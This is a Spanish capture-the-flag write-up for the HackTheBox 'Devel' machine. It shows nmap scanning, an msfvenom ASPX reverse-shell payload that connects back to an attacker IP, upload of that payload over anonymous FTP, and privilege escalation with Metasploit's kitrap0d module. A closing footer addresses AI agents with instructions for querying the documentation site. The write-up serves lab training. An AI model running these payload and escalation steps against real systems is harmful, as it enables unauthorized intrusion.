# Devel
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 10.10.10.5
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sC -sV 10.10.10.5
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Durante el escaneo se identificaron los siguientes puertos abiertos:
* **Puerto 21 (FTP):** FTP es un protocolo de transferencia de archivos, y su mayor riesgo es la posibilidad de acceso an贸nimo o el uso de credenciales d茅biles. Aseg煤rate de verificar si el acceso an贸nimo est谩 habilitado, ya que esto permitir铆a a cualquier persona conectarse sin credenciales. Tambi茅n es importante comprobar si el servidor est谩 configurado para permitir la conexi贸n sobre FTP sin cifrado, ya que los datos y las credenciales se transmiten en texto claro, lo que facilita la interceptaci贸n.
* **Puerto 80 (HTTP):** Este puerto generalmente est谩 asociado a servidores web. Si el servicio est谩 ejecutando un servidor web como Apache, Nginx o IIS, es recomendable buscar vulnerabilidades conocidas relacionadas con el software y versiones en uso (por ejemplo, a trav茅s de CVEs). Adem谩s, es importante realizar pruebas de seguridad en las aplicaciones web que se ejecutan en el servidor, como inyecciones SQL, Cross-Site Scripting (XSS) o vulnerabilidades de escalada de privilegios.
A continuaci贸n, se proceder谩 a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p21,80 -v 10.10.10.5
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Revisamos el puerto 80.
Es un **Microsoft IIS**. Como tenemos el puerto 21 con el usuario Anonymous podemos subir un archivo **.aspx** y hacer una Reverse Shell.
### 馃殌 **EXPLOTACI脫N**
Creamos el archivo malicioso.
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx -o shell.aspx
```
Lo subimos a trav茅s de FTP.
```bash
ftp 10.10.10.5
```
Ejecutamos mediante la URL y conseguimos la conexi贸n con **meterpreter**.
```
shell
```
Se accede al directorio `C:\Windows\TEMP` para operar en un 谩rea temporal segura.
```bash
meterpreter > cd %TEMP%
meterpreter > pwd
```
Se mantiene la sesi贸n abierta mientras se ejecutan otros m贸dulos en Metasploit.
```bash
meterpreter > background
```
Buscar el m贸dulo de recomendaci贸n de exploits locales y ejecutarlo.
```
msf6 exploit(multi/handler) > search suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
msf6 post(multi/recon/local_exploit_suggester) > sessions -l
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
```
Nos llama la atenci贸n el exploit `exploit/windows/local/ms10_015_kitrap0d.`
```bash
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.7
msf6 exploit(windows/local/ms10_015_kitrap0d) > sessions -l
msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
```
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
Ya somos **root**.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://beafn28.gitbook.io/beafn28/writeups/hackthebox/devel.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
